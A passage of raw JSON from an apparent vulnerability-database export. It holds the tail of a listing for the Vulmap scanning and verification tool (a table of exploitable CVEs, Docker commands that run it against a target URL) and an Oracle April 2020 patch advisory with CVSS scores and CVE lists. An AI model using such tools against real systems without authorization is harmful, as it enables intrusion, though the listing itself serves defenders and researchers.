upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2022-10-24T19:58:58", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 399 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2652714.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2015-1832", "CVE-2015-3253", "CVE-2015-7940", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-10244", "CVE-2016-10251", "CVE-2016-10328", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3092", "CVE-2016-4000", "CVE-2016-4463", "CVE-2016-6306", "CVE-2016-6489", "CVE-2016-7103", "CVE-2016-8610", "CVE-2017-12626", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-14735", "CVE-2017-15706", "CVE-2017-3160", "CVE-2017-5130", "CVE-2017-5529", "CVE-2017-5533", "CVE-2017-5645", "CVE-2017-5754", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2018-0732", "CVE-2018-0734", "CVE-2018-0737", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000632", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-1165", "CVE-2018-11775", "CVE-2018-11784", "CVE-2018-11797", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1258", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-1320", "CVE-2018-1336", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17197", "CVE-2018-18227", "CVE-2018-18311", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-19622", "CVE-2018-19623", "CVE-2018-19624", "CVE-2018-19625", "CVE-2018-19626", "CVE-2018-19627", "CVE-2018-19628", "CVE-2018-20346", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-20852", "CVE-2018-5407", "CVE-2018-5711", "CVE-2018-5712", "CVE-2018-6942", "CVE-2018-8014", "CVE-2018-8032", "CVE-2018-8034", "CVE-2018-8036", "CVE-2018-8037", "CVE-2018-8039", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0199", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-0221", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-0228", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10088", "CVE-2019-10092", "CVE-2019-10093", "CVE-2019-10094", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1010238", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12387", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-12415", "CVE-2019-12418", "CVE-2019-12419", "CVE-2019-12855", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-14821", "CVE-2019-14889", "CVE-2019-15161", "CVE-2019-15162", "CVE-2019-15163", "CVE-2019-15164", "CVE-2019-15165", "CVE-2019-1543", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-15601", "CVE-2019-15604", "CVE-2019-15605", "CVE-2019-15606", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16056", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17195", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17563", "CVE-2019-17571", "CVE-2019-18197", "CVE-2019-19242", "CVE-2019-19244", "CVE-2019-19269", "CVE-2019-19317", "CVE-2019-19553", "CVE-2019-19603", "CVE-2019-19645", "CVE-2019-19646", "CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19924", "CVE-2019-19925", "CVE-2019-19926", "CVE-2019-19959", "CVE-2019-20218", "CVE-2019-20330", "CVE-2019-2412", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2756", "CVE-2019-2759", "CVE-2019-2852", "CVE-2019-2853", "CVE-2019-2878", "CVE-2019-2880", "CVE-2019-2899", "CVE-2019-2904", "CVE-2019-3008", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9517", "CVE-2019-9579", "CVE-2020-2514", "CVE-2020-2522", "CVE-2020-2524", "CVE-2020-2553", "CVE-2020-2558", "CVE-2020-2575", "CVE-2020-2578", "CVE-2020-2594", "CVE-2020-2680", "CVE-2020-2706", "CVE-2020-2733", "CVE-2020-2734", "CVE-2020-2735", "CVE-2020-2737", "CVE-2020-2738", "CVE-2020-2739", "CVE-2020-2740", "CVE-2020-2741", "CVE-2020-2742", "CVE-2020-2743", "CVE-2020-2744", "CVE-2020-2745", "CVE-2020-2746", "CVE-2020-2747", "CVE-2020-2748", "CVE-2020-2749", "CVE-2020-2750", "CVE-2020-2751", "CVE-2020-2752", "CVE-2020-2753", "CVE-2020-2754", "CVE-2020-2755", "CVE-2020-2756", "CVE-2020-2757", "CVE-2020-2758", "CVE-2020-2759", "CVE-2020-2760", "CVE-2020-2761", "CVE-2020-2762", "CVE-2020-2763", "CVE-2020-2764", "CVE-2020-2765", "CVE-2020-2766", "CVE-2020-2767", "CVE-2020-2768", "CVE-2020-2769", "CVE-2020-2770", "CVE-2020-2771", "CVE-2020-2772", "CVE-2020-2773", "CVE-2020-2774", "CVE-2020-2775", "CVE-2020-2776", "CVE-2020-2777", "CVE-2020-2778", "CVE-2020-2779", "CVE-2020-2780", "CVE-2020-2781", "CVE-2020-2782", "CVE-2020-2783", "CVE-2020-2784", "CVE-2020-2785", "CVE-2020-2786", "CVE-2020-2787", "CVE-2020-2789", "CVE-2020-2790", "CVE-2020-2791", "CVE-2020-2793", "CVE-2020-2794", "CVE-2020-2795", "CVE-2020-2796", "CVE-2020-2797", "CVE-2020-2798", "CVE-2020-2799", "CVE-2020-2800", "CVE-2020-2801", "CVE-2020-2802", "CVE-2020-2803", "CVE-2020-2804", "CVE-2020-2805", "CVE-2020-2806", "CVE-2020-2807", "CVE-2020-2808", "CVE-2020-2809", "CVE-2020-2810", "CVE-2020-2811", "CVE-2020-2812", "CVE-2020-2813", "CVE-2020-2814", "CVE-2020-2815", "CVE-2020-2816", "CVE-2020-2817", "CVE-2020-2818", "CVE-2020-2819", "CVE-2020-2820", "CVE-2020-2821", "CVE-2020-2822", "CVE-2020-2823", "CVE-2020-2824", "CVE-2020-2825", "CVE-2020-2826", "CVE-2020-2827", "CVE-2020-2828", "CVE-2020-2829", "CVE-2020-2830", "CVE-2020-2831", "CVE-2020-2832", "CVE-2020-2833", "CVE-2020-2834", "CVE-2020-2835", "CVE-2020-2836", "CVE-2020-2837", "CVE-2020-2838", "CVE-2020-2839", "CVE-2020-2840", "CVE-2020-2841", "CVE-2020-2842", "CVE-2020-2843", "CVE-2020-2844", "CVE-2020-2845", "CVE-2020-2846", "CVE-2020-2847", "CVE-2020-2848", "CVE-2020-2849", "CVE-2020-2850", "CVE-2020-2851", "CVE-2020-2852", "CVE-2020-2853", "CVE-2020-2854", "CVE-2020-2855", "CVE-2020-2856", "CVE-2020-2857", "CVE-2020-2858", "CVE-2020-2859", "CVE-2020-2860", "CVE-2020-2861", "CVE-2020-2862", "CVE-2020-2863", "CVE-2020-2864", "CVE-2020-2865", "CVE-2020-2866", "CVE-2020-2867", "CVE-2020-2868", "CVE-2020-2869", "CVE-2020-2870", "CVE-2020-2871", "CVE-2020-2872", "CVE-2020-2873", "CVE-2020-2874", "CVE-2020-2875", "CVE-2020-2876", "CVE-2020-2877", "CVE-2020-2878", "CVE-2020-2879", "CVE-2020-2880", "CVE-2020-2881", "CVE-2020-2882", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2885", "CVE-2020-2886", "CVE-2020-2887", "CVE-2020-2888", "CVE-2020-2889", "CVE-2020-2890", "CVE-2020-2891", "CVE-2020-2892", "CVE-2020-2893", "CVE-2020-2894", "CVE-2020-2895", "CVE-2020-2896", "CVE-2020-2897", "CVE-2020-2898", "CVE-2020-2899", "CVE-2020-2900", "CVE-2020-2901", "CVE-2020-2902", "CVE-2020-2903", "CVE-2020-2904", "CVE-2020-2905", "CVE-2020-2906", "CVE-2020-2907", "CVE-2020-2908", "CVE-2020-2909", "CVE-2020-2910", "CVE-2020-2911", "CVE-2020-2912", "CVE-2020-2913", "CVE-2020-2914", "CVE-2020-2915", "CVE-2020-2920", "CVE-2020-2921", "CVE-2020-2922", "CVE-2020-2923", "CVE-2020-2924", "CVE-2020-2925", "CVE-2020-2926", "CVE-2020-2927", "CVE-2020-2928", "CVE-2020-2929", "CVE-2020-2930", "CVE-2020-2931", "CVE-2020-2932", "CVE-2020-2933", "CVE-2020-2934", "CVE-2020-2935", "CVE-2020-2936", "CVE-2020-2937", "CVE-2020-2938", "CVE-2020-2939", "CVE-2020-2940", "CVE-2020-2941", "CVE-2020-2942", "CVE-2020-2943", "CVE-2020-2944", "CVE-2020-2945", "CVE-2020-2946", "CVE-2020-2947", "CVE-2020-2949", "CVE-2020-2950", "CVE-2020-2951", "CVE-2020-2952", "CVE-2020-2953", "CVE-2020-2954", "CVE-2020-2955", "CVE-2020-2956", "CVE-2020-2958", "CVE-2020-2959", "CVE-2020-2961", "CVE-2020-2963", "CVE-2020-2964", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-7044", "CVE-2020-8840"], "modified": "2020-07-20T00:00:00", "id": "ORACLE:CPUAPR2020", "href": "https://www.oracle.com/security-alerts/cpuapr2020.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
WebLogic Server Deserialization - Remote Code Execution
